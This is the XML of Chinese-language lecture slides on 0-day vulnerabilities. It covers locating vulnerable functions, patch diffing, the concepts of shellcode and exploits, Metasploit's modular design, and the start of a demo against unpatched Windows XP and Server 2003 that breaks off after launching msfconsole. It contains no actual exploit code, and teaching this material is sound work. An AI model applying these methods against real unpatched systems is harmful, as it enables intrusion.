            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）动态调试：使用调试工具、跟踪软件等从栈中一层层地回溯到发生溢出的漏洞函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）静态分析：使用程序逆向工具、反编译工具获得程序的“全局观”和高质量的反汇编代码，辅助动态调试。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）指令追踪技术：可以先运行正常程序，记录下所有执行过的指令序列，然后触发漏洞，记录下攻击状况下程序执行过的指令序列，最后比较这两轮执行过的指令，重点逆向两次执行中表现不同的代码区，并动态调试和跟踪这部分代码，从而迅速定位漏洞函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="207495468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cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.2 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4223489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>除了安全专家需要分析漏洞之外，黑客也经常需要分析漏洞。当微软公布安全补丁后，全世界的用户不可能立刻全部打补丁，因此，在补丁公布后一周左右时间内，其所修复的漏洞在一定范围内仍然是可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全补丁一旦公布，其中的漏洞信息也就相当于随之一同公布了，黑客可以通过比较分析补丁前后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件而得到漏洞的位置，经验丰富的黑客甚至可以在补丁发布当天就写出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，补丁比较也是漏洞分析方法中重要的一种，不同的是这种分析方法多被攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>采用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="174480928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cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.3 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4490908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>是指在缓冲区溢出攻击中植入进程的代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>往往需要汇编语言编写，并转换成二进制机器码，其内容和长度经常还会收到很多苛刻限制，因此开发和调试的难度很高</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>植入代码之前需要做大量的调试工作，调试之后还要计算函数返回地址距离缓冲区的偏移，选择指令的地址，最终才能制作出一个有攻击效果的“承载”着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>的输入字符串。这个代码植入的过程就是漏洞利用就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>一般以一段代码的形式出现，用于生成攻击性的网络数据包或者其它形式的攻击性输入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>的核心是淹没返回地址，劫持进程的控制权，之后跳转区执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>具有一定的通用性不同，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>往往是针对特定的漏洞而言的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4598752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b="1" dirty="0"/>
              <a:t>案例一：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>新安全问题，隐私易遭泄漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>国外媒体报道，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消费者预览版本有一个重大的隐私问题，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 8 PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等社交网络服务之后，即使注销用户或关机，机器上存储的所有来源的联系人缓存也还仍然存在。这意味着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>电脑上登录的任何人都可以看到联系人名单，而实际上应该必须具有管理员权限才可看到。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="360000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	首席</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>研究员和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>nfosec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>tuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顾问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mark Baldwin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>认为，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>需要缓存此类数据以提高操作系统的性能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="107616191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cap="none" dirty="0" smtClean="0"/>
              <a:t>8.2.3 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4490908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>通过规范化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>之间的接口把漏洞利用的过程封装成易用的模块，大大减少了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>开发过程中的重复工作，深刻体现了代码重用和模块化、结构化的思想。在这个平台中：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>）所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>都使用漏洞名称来命名，里边包含有这个漏洞的函数返回地址，所使用的跳转指令地址等关键信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>）将常用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>（例如：用于绑定端口反向连接、执行任意命令等）封装成一个个通用的模块，可以轻易地与任意漏洞的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>进行组合。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="89799073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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为例，演示一次较为完整的远程漏洞利用和入侵过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。其中，攻击方主机使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backtrack 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统（该操作系统集成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），目标主机使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows XP Service Pack 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Server 2003 Service Pack 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统（注意：必须是原版操作系统，安装后未打过系统补丁）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="192911785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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>、在控制台执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>8-7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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8193" name="Picture 1" descr="QQ截图20120519212053"/>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460437" y="2983468"/>
            <a:ext cx="5270500" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460437" y="6488668"/>
            <a:ext cx="5270499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="119659065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8.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
